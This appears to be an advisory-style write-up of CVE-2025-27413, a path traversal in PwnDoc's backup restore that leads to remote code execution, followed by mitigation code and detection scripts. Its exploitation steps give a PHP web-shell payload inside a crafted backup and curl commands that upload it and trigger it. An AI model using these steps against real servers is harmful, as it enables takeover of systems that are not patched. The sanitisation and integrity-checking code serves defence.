How the CVE Works
CVE-2025-27413 is a path traversal in PwnDoc's backup restore feature: administrators can import database backups whose template paths contain traversal sequences (`../`). The vulnerability arises when template updates use these unsanitized paths from the database, allowing an attacker to write arbitrary files anywhere on the filesystem. Since administrators (with the `backups:create`, `backups:update`, and `templates:update` permissions) can thereby overwrite application source code, this leads to Remote Code Execution (RCE). The flaw is fixed in PwnDoc v1.2.0 by validating file paths during backup restoration.
DailyCVE Form
Platform: PwnDoc
Version: <1.2.0
Vulnerability: Path Traversal → RCE
Severity: Critical
Date: 04/15/2025
What Undercode Say:
Exploitation:
1. Craft Malicious Backup:
- Inject `../` sequences in template paths.
```json
{"templates": [{"path": "../../../malicious.php", "content": "<?php system($_GET['cmd']); ?>"}]}
```
2. Upload & Restore Backup:
```bash
curl -X POST -F "file=@malicious_backup.zip" -H "Authorization: Bearer ADMIN_TOKEN" http://pwnDoc-host/api/backups/restore
```
3. Trigger Payload:
```bash
curl http://pwnDoc-host/malicious.php?cmd=id
```
Mitigation:
1. Patch: Upgrade to PwnDoc v1.2.0+.
2. Sanitization: Block `../` in file paths.
```python
def sanitize_path(path):
    # Reject any path containing a traversal sequence before it is used on disk
    if "../" in path:
        raise ValueError("Path traversal detected")
    return path
```
3. Permissions: Restrict `templates:update` to essential users.
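The substring check above rejects the literal `../` sequence but not an absolute path, a backslash separator, or a path that climbs out through an intermediate directory. The following is an added example, not PwnDoc's own code: the `TEMPLATE_DIR` value, the function names and the sample backup document are assumptions. It normalises each template path and accepts it only if it resolves inside the template directory, which is the kind of validation the v1.2.0 fix is described as adding, and it takes the backup format shown in the exploitation steps as input so it also works as a pre-restore check.

```python
import json
import os

# Hypothetical base directory for stored templates (assumption; not PwnDoc's real path)
TEMPLATE_DIR = "/var/www/pwnDoc/templates"


def resolve_template_path(base_dir, relative_path):
    """Return the absolute on-disk path for a template entry, or raise if it escapes base_dir.

    A literal "../" check is not enough: absolute paths, backslashes and paths such as
    "sub/../../x" all need handling, so the path is normalised and then tested for
    containment in base_dir.
    """
    if not relative_path or "\x00" in relative_path:
        raise ValueError("empty path or embedded NUL byte")
    # Treat backslashes as separators too, so "..\\" cannot slip past the check on POSIX hosts
    normalised = relative_path.replace("\\", "/")
    if normalised.startswith("/"):
        raise ValueError(f"absolute path not allowed: {relative_path!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, normalised))
    # commonpath equals base only when candidate is base itself or lies underneath it
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes template directory: {relative_path!r}")
    return candidate


def check_backup_templates(backup_json, base_dir=TEMPLATE_DIR):
    """Validate every template path in a backup document before anything is written.

    Returns (accepted, rejected): accepted maps each original path to its resolved
    location, rejected maps each refused path to the reason.
    """
    data = json.loads(backup_json)
    accepted, rejected = {}, {}
    for entry in data.get("templates", []):
        path = entry.get("path", "")
        try:
            accepted[path] = resolve_template_path(base_dir, path)
        except ValueError as exc:
            rejected[path] = str(exc)
    return accepted, rejected


# Constructed sample backup mirroring the shape of the document above; all paths are made up
SAMPLE_BACKUP = json.dumps({
    "templates": [
        {"path": "report.docx", "content": ""},
        {"path": "sub/dir/audit.docx", "content": ""},
        {"path": "../../../malicious.php", "content": ""},
        {"path": "..\\..\\evil.php", "content": ""},
        {"path": "/etc/cron.d/evil", "content": ""},
        {"path": "sub/../../escape.txt", "content": ""},
    ]
})

if __name__ == "__main__":
    ok, bad = check_backup_templates(SAMPLE_BACKUP)
    for p, where in ok.items():
        print(f"ACCEPT {p!r} -> {where}")
    for p, why in bad.items():
        print(f"REJECT {p!r}: {why}")
```

Resolving with `os.path.realpath` before the containment check also collapses symlinks, so a symlinked subdirectory that points outside the template directory is refused as well.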
Detection:
- Log Analysis:
```bash
# -F matches the literal "../"; an unquoted "." in a grep pattern would match any character
grep "backups/restore" /var/log/pwnDoc/access.log | grep -F '../'
```
- File Integrity Checks:
```bash
find /var/www/pwnDoc -type f -exec sha256sum {} \; > baseline.txt
```
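The `find` one-liner only records a baseline; detection needs a second snapshot and a comparison. The following is an added example, not PwnDoc tooling and not from the original page: the directory layout and file names are constructed. It builds the same SHA-256 map in Python and reports files that were added, removed or modified between two snapshots, which is how a traversal write outside `templates/` or an overwritten source file would show up.

```python
import hashlib
import os
import tempfile


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, read in chunks so large templates are not loaded into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every regular file under root (as a relative path) to its SHA-256 digest.

    Equivalent to the find/sha256sum one-liner, kept as a dict so it can be compared.
    Symlinks are skipped so a link pointing outside root cannot pull in foreign files.
    """
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline


def compare_baseline(before, after):
    """Classify differences between two baselines as added, removed or modified files."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: snapshot a small tree, alter it, and diff the two snapshots."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "templates"))
        with open(os.path.join(root, "server.js"), "w") as fh:
            fh.write("// original application code\n")
        with open(os.path.join(root, "templates", "report.docx"), "wb") as fh:
            fh.write(b"template bytes")
        before = build_baseline(root)

        # Simulate what a traversal write would leave behind: a new file outside
        # templates/ and a changed source file (placeholder content, not a payload)
        with open(os.path.join(root, "dropped.php"), "w") as fh:
            fh.write("constructed placeholder\n")
        with open(os.path.join(root, "server.js"), "a") as fh:
            fh.write("// unexpected modification\n")
        after = build_baseline(root)
        return compare_baseline(before, after)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is taken right after a known-good deployment and stored off the host, and the comparison is scheduled or run after every backup restore so that an unexpected entry under the application root is raised immediately.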
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode